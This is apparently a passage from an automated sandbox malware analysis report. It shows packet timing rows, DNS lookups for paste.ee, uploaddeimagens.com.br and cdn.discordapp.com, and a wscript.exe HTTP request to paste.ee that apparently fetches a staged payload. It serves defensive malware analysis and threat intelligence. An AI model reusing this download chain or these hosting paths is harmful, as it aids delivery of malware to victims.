                May 23, 2024 18:32:53.117137909 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.117187023 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.117203951 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.117213964 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.117259026 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.117908001 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.117921114 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.117979050 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.117988110 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.118045092 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.124901056 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.124926090 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.125015974 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.125015974 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.125022888 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.125077009 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.126164913 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.126185894 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.126236916 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.126241922 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.126271009 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.126301050 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.127120018 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.127139091 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.127192974 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.127198935 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.127506018 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.132621050 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.132642031 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.132725954 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.132734060 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.132776976 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.133243084 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.133260965 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.133308887 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.133313894 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.133339882 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.133354902 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.133774042 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.133795977 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.133832932 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.133838892 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.133867025 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.133887053 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.205472946 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.205497980 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.205585957 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.205602884 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.205688953 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.206132889 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.206151962 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.206207991 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.206216097 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.206263065 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.212404013 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.212423086 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.212483883 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.212492943 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.212544918 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.213803053 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.213819027 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.213897943 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.213897943 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.213907957 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.213963985 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.214863062 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.214879036 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.214943886 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.214953899 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.215024948 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.220526934 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.220545053 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.220612049 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.220621109 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.220664978 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.222932100 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.222949028 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.223007917 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.223015070 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.223061085 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.223723888 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.223745108 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.223792076 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.223799944 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.223850965 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.292948961 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.292967081 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.293061018 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.293071032 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.293138981 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.295567989 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.295583963 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.295635939 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.295643091 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.295681000 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.299654961 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.299669981 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.299719095 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.299726963 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.299772024 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.301934004 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.301947117 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.302007914 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.302015066 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.302134037 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.303188086 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.303203106 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.303258896 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.303267002 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.303307056 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.308882952 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.308897972 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.308957100 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.308964968 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.309014082 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.310786009 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.310808897 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.310869932 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.310877085 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.310949087 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.314775944 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.314798117 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.314857960 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.314865112 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.314907074 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.388763905 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.388793945 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.388886929 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.388904095 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.388953924 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.400973082 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.400990009 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.401056051 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.401072025 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.401114941 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.402806044 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.402821064 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.402863979 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.402873039 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.402894974 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.402919054 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.404623032 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.404635906 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.404720068 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.404726982 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.404764891 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.411118984 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.411147118 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.411205053 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.411211967 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.411247969 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.412719965 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.412739992 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.412789106 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.412796974 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.412833929 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.414057016 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.414072990 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.414123058 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.414128065 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.414164066 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.415381908 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.415399075 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.415467978 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.415472984 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.415509939 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.473750114 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.473781109 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.473875999 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.473901033 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.473952055 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.476077080 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.476099014 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.476146936 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.476155996 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.476193905 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.493613958 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.493638039 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.493715048 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.493722916 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.493767023 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.495307922 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.495323896 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.495372057 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.495378971 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.495414972 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.496800900 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.496817112 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.496885061 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.496891022 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.496932030 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.498687029 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.498702049 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.498775959 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.498783112 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.498827934 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.500637054 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.500653028 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.500708103 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.500714064 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.500751972 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.502368927 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.502384901 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.502439022 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.502445936 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.502486944 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.561323881 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.561352015 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.561484098 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.561492920 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.561544895 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.563446045 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.563462019 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.563507080 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.563513994 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.563543081 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.563553095 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.566620111 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.566641092 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.566696882 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.566704988 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.566749096 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.568902016 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.568933010 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.568964005 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.568969965 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.568996906 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.569015026 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.571491957 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.571510077 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.571563959 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.571568966 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.571614027 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.584731102 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.584753036 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.584834099 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.584841967 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.584882021 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.586915970 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.586931944 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.586986065 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.586992979 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.587033987 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.589517117 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.589534044 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.589581966 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.589587927 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.589627028 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.647901058 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.647928953 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.647984028 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.647994041 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.648035049 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.650043011 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.650063992 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.650099039 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.650104046 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.650130987 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.650150061 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.652475119 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.652494907 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.652561903 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.652569056 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.652616978 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.653615952 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.653633118 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.653692961 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.653700113 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.653747082 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.656127930 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.656143904 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.656179905 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.656186104 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.656204939 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.656224012 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.671888113 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.671909094 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.671952963 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.671962976 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.671993017 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.672003031 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.674330950 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.674346924 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.674417973 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.674438000 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.674500942 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.676367998 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.676384926 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.676445007 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.676453114 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.676492929 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.735836029 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.735860109 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.735955954 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.735966921 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.736011982 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.738420010 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.738439083 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.738507986 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.738514900 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.738557100 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.740972996 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.740992069 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.741055965 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.741061926 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.741101027 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.743696928 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.743714094 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.743767023 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.743773937 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.743812084 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.748498917 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.748517036 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.748570919 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.748579025 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.748620033 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.764568090 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.764641047 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.764648914 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.764663935 CEST44349709188.114.97.3192.168.2.7
                May 23, 2024 18:32:53.764709949 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:53.765023947 CEST49709443192.168.2.7188.114.97.3
                May 23, 2024 18:32:59.304467916 CEST49710443192.168.2.7162.159.130.233
                May 23, 2024 18:32:59.304491997 CEST44349710162.159.130.233192.168.2.7
                May 23, 2024 18:32:59.304569960 CEST49710443192.168.2.7162.159.130.233
                May 23, 2024 18:32:59.304877043 CEST49710443192.168.2.7162.159.130.233
                May 23, 2024 18:32:59.304904938 CEST44349710162.159.130.233192.168.2.7
                May 23, 2024 18:32:59.790158987 CEST44349710162.159.130.233192.168.2.7
                May 23, 2024 18:32:59.790632010 CEST49710443192.168.2.7162.159.130.233
                May 23, 2024 18:32:59.792032957 CEST49710443192.168.2.7162.159.130.233
                May 23, 2024 18:32:59.792042017 CEST44349710162.159.130.233192.168.2.7
                May 23, 2024 18:32:59.792418957 CEST44349710162.159.130.233192.168.2.7
                May 23, 2024 18:32:59.793239117 CEST49710443192.168.2.7162.159.130.233
                May 23, 2024 18:32:59.838490009 CEST44349710162.159.130.233192.168.2.7
                May 23, 2024 18:32:59.945736885 CEST44349710162.159.130.233192.168.2.7
                May 23, 2024 18:32:59.945821047 CEST44349710162.159.130.233192.168.2.7
                May 23, 2024 18:32:59.945909023 CEST49710443192.168.2.7162.159.130.233
                May 23, 2024 18:32:59.951648951 CEST49710443192.168.2.7162.159.130.233
                TimestampSource PortDest PortSource IPDest IP
                May 23, 2024 18:32:41.807306051 CEST5451853192.168.2.71.1.1.1
                May 23, 2024 18:32:41.820628881 CEST53545181.1.1.1192.168.2.7
                May 23, 2024 18:32:45.421716928 CEST4995353192.168.2.71.1.1.1
                May 23, 2024 18:32:45.589277983 CEST53499531.1.1.1192.168.2.7
                May 23, 2024 18:32:59.295003891 CEST5094653192.168.2.71.1.1.1
                May 23, 2024 18:32:59.303790092 CEST53509461.1.1.1192.168.2.7
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                May 23, 2024 18:32:41.807306051 CEST192.168.2.71.1.1.10x2b7cStandard query (0)paste.eeA (IP address)IN (0x0001)false
                May 23, 2024 18:32:45.421716928 CEST192.168.2.71.1.1.10x90cdStandard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                May 23, 2024 18:32:59.295003891 CEST192.168.2.71.1.1.10x6aeStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                May 23, 2024 18:32:41.820628881 CEST1.1.1.1192.168.2.70x2b7cNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                May 23, 2024 18:32:41.820628881 CEST1.1.1.1192.168.2.70x2b7cNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                May 23, 2024 18:32:45.589277983 CEST1.1.1.1192.168.2.70x90cdNo error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
                May 23, 2024 18:32:45.589277983 CEST1.1.1.1192.168.2.70x90cdNo error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
                May 23, 2024 18:32:59.303790092 CEST1.1.1.1192.168.2.70x6aeNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                May 23, 2024 18:32:59.303790092 CEST1.1.1.1192.168.2.70x6aeNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                May 23, 2024 18:32:59.303790092 CEST1.1.1.1192.168.2.70x6aeNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                May 23, 2024 18:32:59.303790092 CEST1.1.1.1192.168.2.70x6aeNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                May 23, 2024 18:32:59.303790092 CEST1.1.1.1192.168.2.70x6aeNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                • paste.ee
                • uploaddeimagens.com.br
                • cdn.discordapp.com
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.749704188.114.96.3443180C:\Windows\System32\wscript.exe
                TimestampBytes transferredDirectionData
                2024-05-23 16:32:42 UTC319OUTGET /d/ZKQQ9 HTTP/1.1
                Accept: */*
                Accept-Language: en-ch
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
